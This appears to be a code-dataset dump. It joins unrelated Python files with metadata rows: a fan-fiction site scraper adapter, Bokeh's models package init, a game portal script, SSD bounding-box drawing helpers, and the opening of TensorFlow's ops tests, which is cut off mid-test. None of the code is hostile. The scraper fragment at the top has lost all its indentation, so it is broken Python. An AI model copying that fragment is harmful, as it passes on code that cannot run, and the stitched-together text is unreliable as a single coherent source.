data = self._fetchUrl(url, parameters)
except urllib2.HTTPError:
raise exception(self.url)
# Just let self._fetchUrl throw the exception, don't catch and
# customize it.
else:
data = self._fetchUrl(url, parameters)
return self.make_soup(data)
@staticmethod
def getSiteDomain():
return SpikeluverComAdapter.SITE_DOMAIN
@classmethod
def getSiteExampleURLs(cls):
return cls.VIEW_STORY_URL_TEMPLATE % 1234
def getSiteURLPattern(self):
return re.escape(self.VIEW_STORY_URL_TEMPLATE[:-2]) + r'\d+$'
def extractChapterUrlsAndMetadata(self):
soup = self._customized_fetch_url(self.url + self.METADATA_URL_SUFFIX)
errortext_div = soup.find('div', {'class': 'errortext'})
if errortext_div:
error_text = ''.join(errortext_div(text=True)).strip()
if error_text == self.STORY_DOES_NOT_EXIST_ERROR_TEXT:
raise exceptions.StoryDoesNotExist(self.url)
# No additional login is required, just check for adult
pagetitle_div = soup.find('div', id='pagetitle')
if pagetitle_div.a['href'].startswith('javascript:'):
if not(self.is_adult or self.getConfig('is_adult')):
raise exceptions.AdultCheckRequired(self.url)
url = ''.join([self.url, self.METADATA_URL_SUFFIX, self.AGE_CONSENT_URL_SUFFIX])
soup = self._customized_fetch_url(url)
pagetitle_div = soup.find('div', id='pagetitle')
self.story.setMetadata('title', stripHTML(pagetitle_div.a))
author_anchor = pagetitle_div.a.findNextSibling('a')
url = urlparse.urljoin(self.BASE_URL, author_anchor['href'])
components = urlparse.urlparse(url)
query_data = urlparse.parse_qs(components.query)
self.story.setMetadata('author', stripHTML(author_anchor))
self.story.setMetadata('authorId', query_data['uid'][0])
self.story.setMetadata('authorUrl', url)
sort_div = soup.find('div', id='sort')
self.story.setMetadata('reviews', stripHTML(sort_div('a')[1]))
listbox_tag = soup.find('div', {'class': 'listbox'})
for span_tag in listbox_tag('span'):
key = span_tag.string
if key:
key = key.strip(' :')
try:
value = stripHTML(span_tag.nextSibling)
# This can happen with some fancy markup in the summary. Just
# ignore this error and set value to None, the summary parsing
# takes care of this
except AttributeError:
value = None
if key == 'Summary':
contents = []
keep_summary_html = self.getConfig('keep_summary_html')
for sibling in _yield_next_siblings(span_tag):
if isinstance(sibling, Tag):
# Encountered next label, break. Not as bad as other
# e-fiction sites, let's hope this is enough for proper
# parsing.
if sibling.name == 'span' and sibling.get('class', None) == 'label':
break
if keep_summary_html:
contents.append(self.utf8FromSoup(self.url, sibling))
else:
contents.append(''.join(sibling(text=True)))
else:
contents.append(sibling)
# Remove the preceding break line tag and other crud
if contents:
contents.pop()
if contents:
contents.pop()
self.story.setMetadata('description', ''.join(contents))
elif key == 'Rated':
self.story.setMetadata('rating', value)
elif key == 'Categories':
for sibling in span_tag.findNextSiblings(['a', 'br']):
if sibling.name == 'br':
break
self.story.addToList('category', stripHTML(sibling))
# Seems to be always "None" for some reason
elif key == 'Characters':
for sibling in span_tag.findNextSiblings(['a', 'br']):
if sibling.name == 'br':
break
self.story.addToList('characters', stripHTML(sibling))
elif key == 'Genres':
for sibling in span_tag.findNextSiblings(['a', 'br']):
if sibling.name == 'br':
break
self.story.addToList('genre', stripHTML(sibling))
elif key == 'Warnings':
for sibling in span_tag.findNextSiblings(['a', 'br']):
if sibling.name == 'br':
break
self.story.addToList('warnings', stripHTML(sibling))
# Challenges
elif key == 'Series':
a = span_tag.findNextSibling('a')
if not a:
continue
self.story.setMetadata('series', stripHTML(a))
self.story.setMetadata('seriesUrl', urlparse.urljoin(self.BASE_URL, a['href']))
elif key == 'Chapters':
self.story.setMetadata('numChapters', int(value))
elif key == 'Completed':
self.story.setMetadata('status', 'Completed' if value == 'Yes' else 'In-Progress')
elif key == 'Word count':
self.story.setMetadata('numWords', value)
elif key == 'Published':
self.story.setMetadata('datePublished', makeDate(value, self.DATETIME_FORMAT))
elif key == 'Updated':
self.story.setMetadata('dateUpdated', makeDate(value, self.DATETIME_FORMAT))
for p_tag in listbox_tag.findNextSiblings('p'):
chapter_anchor = p_tag.find('a', href=lambda href: href and href.startswith('viewstory.php?sid='))
if not chapter_anchor:
continue
title = stripHTML(chapter_anchor)
url = urlparse.urljoin(self.BASE_URL, chapter_anchor['href'])
self.chapterUrls.append((title, url))
def getChapterText(self, url):
url += self.AGE_CONSENT_URL_SUFFIX
soup = self._customized_fetch_url(url)
return self.utf8FromSoup(url, soup.find('div', id='story'))
| 38.192488 | 133 | 0.587216 |
6f48d22148d40e03dac4ff439f8196edbdc90641 | 2,966 | py | Python | bokeh/models/__init__.py | timgates42/bokeh | fb8b07b838f4d07d520cfe899779a11bc89f3c77 | [
"BSD-3-Clause"
] | 1 | 2015-01-31T14:42:39.000Z | 2015-01-31T14:42:39.000Z | bokeh/models/__init__.py | timgates42/bokeh | fb8b07b838f4d07d520cfe899779a11bc89f3c77 | [
"BSD-3-Clause"
] | 1 | 2021-05-08T06:24:26.000Z | 2021-05-08T06:24:26.000Z | bokeh/models/__init__.py | timgates42/bokeh | fb8b07b838f4d07d520cfe899779a11bc89f3c77 | [
"BSD-3-Clause"
] | 1 | 2021-03-04T05:23:36.000Z | 2021-03-04T05:23:36.000Z | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Provide Bokeh model "building block" classes.
One of the central design principles of Bokeh is that, regardless of
how the plot creation code is spelled in Python (or other languages),
the result is an object graph that encompasses all the visual and
data aspects of the scene. Furthermore, this *scene graph* is to be
serialized, and it is this serialized graph that the client library
BokehJS uses to render the plot. The low-level objects that comprise
a Bokeh scene graph are called :ref:`Models <bokeh.model>`.
'''
# This file is excluded from flake8 checking in setup.cfg
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from ..core.property.dataspec import expr, field, value # Legacy API
from ..model import Model
from .annotations import *
from .arrow_heads import *
from .axes import *
from .callbacks import *
from .expressions import *
from .filters import *
from .formatters import *
from .glyphs import *
from .graphs import *
from .grids import *
from .layouts import *
from .map_plots import *
from .mappers import *
from .markers import *
from .plots import *
from .ranges import *
from .renderers import *
from .scales import *
from .selections import *
from .sources import *
from .textures import *
from .tickers import *
from .tiles import *
from .tools import *
from .transforms import *
from .widgets import *
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
# __all__ = include all explicit transitive imports above
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| 36.617284 | 78 | 0.433918 |
9d2e5bc7524e4b305ab0524c691b410a62e7d66a | 147 | py | Python | scripts/portal/go_reward.py | G00dBye/YYMS | 1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb | [
"MIT"
] | 54 | 2019-04-16T23:24:48.000Z | 2021-12-18T11:41:50.000Z | scripts/portal/go_reward.py | G00dBye/YYMS | 1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb | [
"MIT"
] | 3 | 2019-05-19T15:19:41.000Z | 2020-04-27T16:29:16.000Z | scripts/portal/go_reward.py | G00dBye/YYMS | 1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb | [
"MIT"
] | 49 | 2020-11-25T23:29:16.000Z | 2022-03-26T16:20:24.000Z | # 811000500 - Princess No (pno)
response = sm.sendAskYesNo("Would you like to leave?")
if response:
sm.clearPartyInfo(811000100)
sm.dispose()
| 21 | 54 | 0.727891 |
563c085d1b09e42dfc2fa5ce87e1f6cfd2218502 | 4,773 | py | Python | SSD/notebooks/visualization.py | BerkeleyAutomation/traffic-cam-pipeline | 7bca5aefb8ee140348a3a2080a36d0acfbd39723 | [
"MIT"
] | null | null | null | SSD/notebooks/visualization.py | BerkeleyAutomation/traffic-cam-pipeline | 7bca5aefb8ee140348a3a2080a36d0acfbd39723 | [
"MIT"
] | null | null | null | SSD/notebooks/visualization.py | BerkeleyAutomation/traffic-cam-pipeline | 7bca5aefb8ee140348a3a2080a36d0acfbd39723 | [
"MIT"
] | null | null | null | # Copyright 2017 Paul Balanca. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import cv2
import random
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import matplotlib.cm as mpcm
# =========================================================================== #
# Some colormaps.
# =========================================================================== #
def colors_subselect(colors, num_classes=21):
    """Pick ``num_classes`` evenly spaced colors from a palette.

    Float channels (e.g. matplotlib colormap entries in [0, 1]) are scaled
    to 0-255 integers; integer channels are copied as-is.  Each returned
    entry is a plain list of channel values.
    """
    step = len(colors) // num_classes
    picked = []
    for idx in range(num_classes):
        entry = colors[idx * step]
        if isinstance(entry[0], float):
            picked.append([int(channel * 255) for channel in entry])
        else:
            picked.append(list(entry))
    return picked
# 21 colors sampled evenly from matplotlib's "plasma" colormap and scaled
# to 0-255 integer channels via colors_subselect.
colors_plasma = colors_subselect(mpcm.plasma.colors, num_classes=21)
# Fixed 21-entry RGB palette (Tableau-style colors, plus white first).
colors_tableau = [(255, 255, 255), (31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120),
                  (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150),
                  (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),
                  (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),
                  (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]
# =========================================================================== #
# OpenCV drawing.
# =========================================================================== #
def draw_lines(img, lines, color=(255, 0, 0), thickness=2):
    """Draw a collection of lines on an image (in place).

    Args:
        img: image to draw on (modified in place by cv2.line).
        lines: iterable of line groups; each group holds (x1, y1, x2, y2)
            endpoint tuples.
        color: BGR color. Default changed from a mutable list to an
            equivalent tuple to avoid the shared-mutable-default pitfall.
        thickness: line thickness in pixels.
    """
    for segment_group in lines:
        for x1, y1, x2, y2 in segment_group:
            cv2.line(img, (x1, y1), (x2, y2), color, thickness)
def draw_rectangle(img, p1, p2, color=(255, 0, 0), thickness=2):
    """Draw one rectangle on the image (in place).

    p1 and p2 are corner points given in (row, col) order; they are
    reversed with [::-1] because cv2.rectangle expects (x, y).
    The default color is now an immutable tuple (was a mutable list).
    """
    cv2.rectangle(img, p1[::-1], p2[::-1], color, thickness)
def draw_bbox(img, bbox, shape, label, color=(255, 0, 0), thickness=2):
    """Draw one normalized bounding box with its label on the image (in place).

    Args:
        img: image to draw on.
        bbox: normalized box; coordinates are scaled by shape[0]/shape[1].
            NOTE(review): assumes bbox order matches (shape[0], shape[1])
            axis order -- confirm against the caller's bbox convention,
            since cv2 expects points in (x, y) order and no reversal is
            applied here (unlike draw_rectangle above).
        shape: two scale factors applied to the box coordinates.
        label: object rendered via str() next to the top corner.
        color: BGR color; default changed to an immutable tuple (was a
            mutable list default).
        thickness: rectangle line thickness.
    """
    p1 = (int(bbox[0] * shape[0]), int(bbox[1] * shape[1]))
    p2 = (int(bbox[2] * shape[0]), int(bbox[3] * shape[1]))
    cv2.rectangle(img, p1, p2, color, thickness)
    # Shift the text anchor below the corner so it does not overlap the edge.
    p1 = (p1[0], p1[1]+15)
    cv2.putText(img, str(label), p1, cv2.FONT_HERSHEY_DUPLEX, 0.5, color, 1)
def bboxes_draw_on_img(img, classes, scores, bboxes, colors, thickness=2):
    """Draw every detection (box + "class/score" text) on the image in place.

    NOTE(review): bbox[0]/bbox[2] are scaled by *width* and bbox[1]/bbox[3]
    by *height*, i.e. boxes are treated as (xmin, ymin, xmax, ymax) in
    cv2's (x, y) point order.  This is the opposite axis convention from
    plt_bboxes below -- confirm which format the detector emits.
    """
    height, width, channel = img.shape
    for i in range(bboxes.shape[0]):
        bbox = bboxes[i]
        # Per-class color lookup.
        color = colors[classes[i]]
        # Draw bounding box...
        p1 = (int(bbox[0] * width), int(bbox[1] * height))
        p2 = (int(bbox[2] * width), int(bbox[3] * height))
        cv2.rectangle(img, p1, p2, color, thickness)
        # Draw text...
        s = '%s/%.3f' % (classes[i], scores[i])
        # Raise the text anchor slightly above the box corner.
        p1 = (p1[0], p1[1]-5)
        cv2.putText(img, s, p1, cv2.FONT_HERSHEY_DUPLEX, 0.4, color, 1)
# =========================================================================== #
# Matplotlib show...
# =========================================================================== #
def plt_bboxes(img, classes, scores, bboxes, figsize=(10,10), linewidth=1.5):
    """Visualize bounding boxes. Largely inspired by SSD-MXNET!

    Args:
        img: HxWxC image array shown as the background.
        classes: per-detection class ids; ids < 0 are skipped.
        scores: per-detection confidence scores.
        bboxes: normalized boxes, assumed in SSD order
            [ymin, xmin, ymax, xmax] -- TODO confirm against the detector.
        figsize: matplotlib figure size.
        linewidth: rectangle edge width.
    """
    fig = plt.figure(figsize=figsize)
    plt.imshow(img)
    height = img.shape[0]
    width = img.shape[1]
    colors = dict()
    for i in range(classes.shape[0]):
        cls_id = int(classes[i])
        if cls_id >= 0:
            score = scores[i]
            if cls_id not in colors:
                # One random color per class, reused across detections.
                colors[cls_id] = (random.random(), random.random(), random.random())
            # Bug fix: y-coordinates must be scaled by image *height* and
            # x-coordinates by image *width*.  The previous code scaled the
            # Rectangle's x values by height and its y values by width,
            # transposing every box on non-square images.
            ymin = int(bboxes[i, 0] * height)
            xmin = int(bboxes[i, 1] * width)
            ymax = int(bboxes[i, 2] * height)
            xmax = int(bboxes[i, 3] * width)
            rect = plt.Rectangle((xmin, ymin), xmax - xmin,
                                 ymax - ymin, fill=False,
                                 edgecolor=colors[cls_id],
                                 linewidth=linewidth)
            plt.gca().add_patch(rect)
            class_name = str(cls_id)
            plt.gca().text(xmin, ymin - 2,
                           '{:s} | {:.3f}'.format(class_name, score),
                           bbox=dict(facecolor=colors[cls_id], alpha=0.5),
                           fontsize=12, color='white')
    plt.show()
| 41.504348 | 100 | 0.508695 |
2ce47c4973f5695e3aebe6f6bafea99ac0d31303 | 138,924 | py | Python | tensorflow/python/framework/ops_test.py | jasonhargrove/tensorflow | 2cbcbccc976313810242ea7256c24030815f140f | [
"Apache-2.0"
] | 1 | 2021-08-18T18:07:02.000Z | 2021-08-18T18:07:02.000Z | tensorflow/python/framework/ops_test.py | harishsg99/tensorflow | 4f5a6e748eb8fb16d10738b7d1c2c95d5e6c008c | [
"Apache-2.0"
] | null | null | null | tensorflow/python/framework/ops_test.py | harishsg99/tensorflow | 4f5a6e748eb8fb16d10738b7d1c2c95d5e6c008c | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.framework.ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import os
import threading
import weakref
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import tensor_shape_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.autograph.core import ag_ctx
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as eager_function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import composite_tensor
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework import type_spec
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import resources
from tensorflow.python.ops import special_math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
import tensorflow.python.ops.gradients # pylint: disable=unused-import
from tensorflow.python.platform import googletest
from tensorflow.python.util import compat
class ResourceTest(test_util.TensorFlowTestCase):
  """Tests for creating, registering and initializing graph resources."""
  @test_util.run_deprecated_v1
  def testBuildGraph(self):
    # A stub resource handle can be created and its create op run.
    with self.cached_session():
      pt = test_ops.stub_resource_handle_op(container="a", shared_name="b")
      test_ops.resource_create_op(pt).run()
  @test_util.run_deprecated_v1
  def testInitialize(self):
    # A registered resource reports uninitialized until its create op runs.
    with self.cached_session():
      handle = test_ops.stub_resource_handle_op(container="a", shared_name="b")
      resources.register_resource(
          handle=handle,
          create_op=test_ops.resource_create_op(handle),
          is_initialized_op=test_ops.resource_initialized_op(handle))
      # Exactly one shared resource is uninitialized before initialization.
      self.assertEqual(
          len(
              resources.report_uninitialized_resources(
                  resources.shared_resources()).eval()), 1)
      resources.initialize_resources(resources.shared_resources()).run()
      # ...and none afterwards.
      self.assertEqual(
          len(
              resources.report_uninitialized_resources(
                  resources.shared_resources()).eval()), 0)
class TensorAndShapeTest(test_util.TensorFlowTestCase):
  """Tests for Tensor behavior: shapes, iteration/bool errors, ref()
  hashability, and overloaded bitwise operators."""
  def testShape(self):
    # A freshly built op output has an unknown shape until set_shape().
    op = ops.Operation(
        ops._NodeDef("FloatOutput", "myop"), ops.Graph(), [], [dtypes.float32])
    t = op.outputs[0]
    self.assertEqual(tensor_shape.unknown_shape(), t.get_shape())
    t.set_shape([1, 2, 3])
    self.assertEqual([1, 2, 3], t.get_shape())
  def testIterable(self):
    if not context.executing_eagerly():
      self.skipTest("Eager-mode test")
    op = ops.Operation(
        ops._NodeDef("FloatOutput", "myop"), ops.Graph(), [], [dtypes.float32])
    t = op.outputs[0]
    with self.assertRaisesRegex(TypeError, "Cannot iterate"):
      iter(t)
  def testIterableGraph(self):
    if context.executing_eagerly():
      self.skipTest("Graph-mode test")
    op = ops.Operation(
        ops._NodeDef("FloatOutput", "myop"), ops.Graph(), [], [dtypes.float32])
    t = op.outputs[0]
    # The error message varies with the AutoGraph conversion status.
    with self.assertRaisesRegex(TypeError, "iterating.*not allowed in Graph"):
      next(iter(t))
    with self.assertRaisesRegex(TypeError, "iterating.*AutoGraph did convert"):
      with ag_ctx.ControlStatusCtx(ag_ctx.Status.ENABLED):
        next(iter(t))
    with self.assertRaisesRegex(TypeError, "iterating.*AutoGraph is disabled"):
      with ag_ctx.ControlStatusCtx(ag_ctx.Status.DISABLED):
        next(iter(t))
  def testImplicitBool(self):
    # bool() on a symbolic tensor raises, with AutoGraph-aware wording.
    op = ops.Operation(
        ops._NodeDef("FloatOutput", "myop"), ops.Graph(), [], [dtypes.bool])
    t = op.outputs[0]
    with self.assertRaisesRegex(TypeError,
                                "using.*as a.*bool.*not allowed in Graph"):
      bool(t)
    with self.assertRaisesRegex(TypeError,
                                "using.*as a.*bool.*AutoGraph did convert"):
      with ag_ctx.ControlStatusCtx(ag_ctx.Status.ENABLED):
        bool(t)
    with self.assertRaisesRegex(TypeError,
                                "using.*as a.*bool.*AutoGraph is disabled"):
      with ag_ctx.ControlStatusCtx(ag_ctx.Status.DISABLED):
        bool(t)
  def testAddShape(self):
    with self.cached_session():
      a = array_ops.zeros([2, 3])
      b = array_ops.ones([1, 3])
      c = a + b
      self.assertEqual([2, 3], c.shape)
  @test_util.run_deprecated_v1
  def testUnknownDim(self):
    # Broadcasting preserves the unknown middle dimension.
    with self.cached_session():
      a = array_ops.placeholder(dtype=dtypes.float32, shape=[2, None, 3])
      b = array_ops.placeholder(dtype=dtypes.float32, shape=[2, None, 3])
      c = a + b
      self.assertEqual([2, None, 3], c.shape.as_list())
  @test_util.run_deprecated_v1
  def testUnknownShape(self):
    with self.cached_session():
      a = array_ops.placeholder(dtype=dtypes.float32, shape=None)
      b = array_ops.ones([1, 3])
      c = a + b
      self.assertEqual(tensor_shape.unknown_shape(), c.shape)
  @test_util.run_deprecated_v1
  def testScalarShape(self):
    with self.cached_session():
      a = array_ops.placeholder(dtype=dtypes.float32, shape=[])
      b = array_ops.ones([])
      c = a + b
      self.assertEqual(tensor_shape.TensorShape([]), c.shape)
  @test_util.run_deprecated_v1
  def testShapeFunctionError(self):
    # Incompatible shapes produce a descriptive shape-inference error.
    with self.cached_session():
      a = array_ops.ones([1, 2, 3])
      b = array_ops.ones([4, 5, 6])
      with self.assertRaisesRegex(
          ValueError, r"Dimensions must be equal, but are 2 and 5 for .*add"
          r".*Add(V2)?.* with input shapes: \[1,2,3\], \[4,5,6\]."):
        _ = a + b
  def testNumpyArray(self):
    # Symbolic tensors reject numpy conversion and len().
    with ops.Graph().as_default():
      x = array_ops.ones((3, 4), name="test_ones")
      with self.assertRaisesRegex(NotImplementedError,
                                  r"Cannot convert a symbolic.+test_ones"):
        np.array(x)
      with self.assertRaisesRegex(TypeError, "not well defined.+test_ones"):
        len(x)
    # EagerTensors should still behave as numpy arrays.
    with context.eager_mode():
      x = array_ops.ones((3, 4))
      self.assertAllEqual(x, np.ones((3, 4)))
      self.assertAllEqual(np.array(x), np.ones((3, 4)))
      self.assertLen(x, 3)
  def testConstructor(self):
    # numpy-style attribute names get a pointer to the numpy equivalents.
    a = array_ops.ones([])
    for name in ["T", "astype", "ravel", "transpose", "reshape", "clip", "size",
                 "tolist", "data"]:
      with self.assertRaisesRegex(
          AttributeError, r"If you are looking for numpy-related methods"):
        getattr(a, name)
    with self.assertRaisesRegex(
        AttributeError, r"object has no attribute"):
      a.foo_bar()
  def testRef(self):
    # ref() equality follows object identity, not value equality.
    x1 = constant_op.constant(3)
    x2 = x1
    y = constant_op.constant(3)
    z = constant_op.constant([6, 10])
    w = variables.Variable(5)
    self.assertEqual(x1.ref(), x1.ref())
    self.assertEqual(x2.ref(), x2.ref())
    self.assertEqual(x1.ref(), x2.ref())
    self.assertEqual(y.ref(), y.ref())
    self.assertEqual(z.ref(), z.ref())
    self.assertEqual(w.ref(), w.ref())
    self.assertNotEqual(x1.ref(), y.ref())
    self.assertNotEqual(x1.ref(), z.ref())
    self.assertNotEqual(x1.ref(), w.ref())
    self.assertNotEqual(y.ref(), z.ref())
    self.assertNotEqual(y.ref(), w.ref())
    self.assertNotEqual(z.ref(), w.ref())
  def testRefDeref(self):
    # deref() returns the identical wrapped object.
    x1 = constant_op.constant(3)
    x2 = x1
    y = constant_op.constant(3)
    z = constant_op.constant([6, 10])
    w = variables.Variable(5)
    self.assertIs(x1, x1.ref().deref())
    self.assertIs(x2, x2.ref().deref())
    self.assertIs(x1, x2.ref().deref())
    self.assertIs(x2, x1.ref().deref())
    self.assertIs(y, y.ref().deref())
    self.assertIs(z, z.ref().deref())
    self.assertIsNot(x1, y.ref().deref())
    self.assertIsNot(x1, z.ref().deref())
    self.assertIsNot(x1, w.ref().deref())
    self.assertIsNot(y, z.ref().deref())
    self.assertIsNot(y, w.ref().deref())
    self.assertIsNot(z, w.ref().deref())
  def testRefInSet(self):
    # Refs of the same object collapse to a single set entry.
    x1 = constant_op.constant(3)
    x2 = x1
    y = constant_op.constant(3)
    z = constant_op.constant([6, 10])
    w = variables.Variable(5)
    self.assertEqual(x1.ref(), x2.ref())
    tensor_set = {
        x1.ref(),
        x2.ref(),
        y.ref(),
        z.ref(),
        w.ref(),
    }
    self.assertLen(tensor_set, 4)
    self.assertIn(x1.ref(), tensor_set)
    self.assertIn(x2.ref(), tensor_set)
    self.assertIn(y.ref(), tensor_set)
    self.assertIn(z.ref(), tensor_set)
    self.assertIn(w.ref(), tensor_set)
  def testRefInDict(self):
    # Refs of the same object hit the same dict slot.
    x1 = constant_op.constant(3)
    x2 = x1
    y = constant_op.constant(3)
    z = constant_op.constant([6, 10])
    w = variables.Variable(5)
    self.assertEqual(x1.ref(), x2.ref())
    tensor_dict = {
        x1.ref(): "x1",
        y.ref(): "y",
        z.ref(): "z",
        w.ref(): "w",
    }
    self.assertLen(tensor_dict, 4)
    # Overwriting x1
    tensor_dict[x2.ref()] = "x2"
    self.assertLen(tensor_dict, 4)
    self.assertEqual(tensor_dict[x1.ref()], "x2")
    self.assertEqual(tensor_dict[x2.ref()], "x2")
    self.assertEqual(tensor_dict[y.ref()], "y")
    self.assertEqual(tensor_dict[z.ref()], "z")
    self.assertEqual(tensor_dict[w.ref()], "w")
  def testTensorRefStrong(self):
    # ref() keeps the tensor alive after the original binding is deleted.
    x = constant_op.constant(1.)
    x_ref = x.ref()
    del x
    self.assertIsNotNone(x_ref.deref())
  def testVariableRefStrong(self):
    # Same strong-reference behavior for variables.
    x = variables.Variable(1.)
    x_ref = x.ref()
    del x
    self.assertIsNotNone(x_ref.deref())
  @test_util.run_in_graph_and_eager_modes
  def testBitwiseAndNumeric(self):
    x = constant_op.constant([0, 1, 3])
    y = constant_op.constant([1, 1, 1])
    z = x & y
    self.assertAllEqual(z, [0, 1, 1])
  @test_util.run_in_graph_and_eager_modes
  def testBitwiseAndBool(self):
    x = constant_op.constant([False, False, True, True])
    y = constant_op.constant([False, True, False, True])
    z = x & y
    self.assertAllEqual(z, [False, False, False, True])
  @test_util.run_in_graph_and_eager_modes
  def testBitwiseAndErrors(self):
    # Mixed-dtype operands fail; the exception type differs by mode.
    x_int = constant_op.constant(0)
    x_bool = constant_op.constant(True)
    if context.executing_eagerly():  # :(
      expected_errtype = errors.InvalidArgumentError
    else:
      expected_errtype = TypeError
    with self.assertRaises(expected_errtype):
      _ = x_int & x_bool
    with self.assertRaises(expected_errtype):
      _ = x_int & constant_op.constant("a")
    with self.assertRaises(expected_errtype):
      _ = x_bool & x_int
    with self.assertRaises(expected_errtype):
      _ = x_bool & constant_op.constant("a")
    with self.assertRaises(expected_errtype):
      _ = constant_op.constant("a") & constant_op.constant("b")
  @test_util.run_in_graph_and_eager_modes
  def testBitwiseOrNumeric(self):
    x = constant_op.constant([0, 1, 2])
    y = constant_op.constant([1, 1, 1])
    z = x | y
    self.assertAllEqual(z, [1, 1, 3])
  @test_util.run_in_graph_and_eager_modes
  def testBitwiseOrBool(self):
    x = constant_op.constant([False, False, True, True])
    y = constant_op.constant([False, True, False, True])
    z = x | y
    self.assertAllEqual(z, [False, True, True, True])
  @test_util.run_in_graph_and_eager_modes
  def testBitwiseOrErrors(self):
    x_int = constant_op.constant(0)
    x_bool = constant_op.constant(True)
    if context.executing_eagerly():  # :(
      expected_errtype = errors.InvalidArgumentError
    else:
      expected_errtype = TypeError
    with self.assertRaises(expected_errtype):
      _ = x_int | x_bool
    with self.assertRaises(expected_errtype):
      _ = x_int | constant_op.constant("a")
    with self.assertRaises(expected_errtype):
      _ = x_bool | x_int
    with self.assertRaises(expected_errtype):
      _ = x_bool | constant_op.constant("a")
    with self.assertRaises(expected_errtype):
      _ = constant_op.constant("a") | constant_op.constant("b")
  @test_util.run_in_graph_and_eager_modes
  def testBitwiseXorNumeric(self):
    x = constant_op.constant([0, 1, 3])
    y = constant_op.constant([1, 1, 1])
    z = x ^ y
    self.assertAllEqual(z, [1, 0, 2])
  @test_util.run_in_graph_and_eager_modes
  def testBitwiseXorBool(self):
    x = constant_op.constant([False, False, True, True])
    y = constant_op.constant([False, True, False, True])
    z = x ^ y
    self.assertAllEqual(z, [False, True, True, False])
  @test_util.run_in_graph_and_eager_modes
  def testBitwiseXorErrors(self):
    x_int = constant_op.constant(0)
    x_bool = constant_op.constant(True)
    if context.executing_eagerly():  # :(
      expected_errtype = errors.InvalidArgumentError
    else:
      expected_errtype = TypeError
    with self.assertRaises(expected_errtype):
      _ = x_int ^ x_bool
    with self.assertRaises(expected_errtype):
      _ = x_int ^ constant_op.constant("a")
    with self.assertRaises(expected_errtype):
      _ = x_bool ^ x_int
    with self.assertRaises(expected_errtype):
      _ = x_bool ^ constant_op.constant("a")
    with self.assertRaises(expected_errtype):
      _ = constant_op.constant("a") ^ constant_op.constant("b")
  @test_util.run_in_graph_and_eager_modes
  def testBitwiseNotNumeric(self):
    x = constant_op.constant([0, dtypes.int32.min, 1])
    # pylint: disable=invalid-unary-operand-type
    y = ~x
    self.assertAllEqual(y, [-1, dtypes.int32.max, -2])
  @test_util.run_in_graph_and_eager_modes
  def testBitwiseNotBool(self):
    x = constant_op.constant([False, True])
    # pylint: disable=invalid-unary-operand-type
    y = ~x
    self.assertAllEqual(y, [True, False])
  @test_util.run_in_graph_and_eager_modes
  def testBitwiseNotErrors(self):
    if context.executing_eagerly():  # :(
      expected_errtype = errors.InvalidArgumentError
    else:
      expected_errtype = TypeError
    # pylint: disable=invalid-unary-operand-type
    with self.assertRaises(expected_errtype):
      _ = ~constant_op.constant("a")
@test_util.run_all_in_graph_and_eager_modes
class IndexedSlicesTest(test_util.TensorFlowTestCase):
  """Tests for IndexedSlices conversion, copying and operator overloads."""
  def testToTensor(self):
    # Conversion requires a dense_shape; without one it raises ValueError.
    values = constant_op.constant([2, 3, 5, 7], shape=[2, 2])
    indices = constant_op.constant([0, 2])
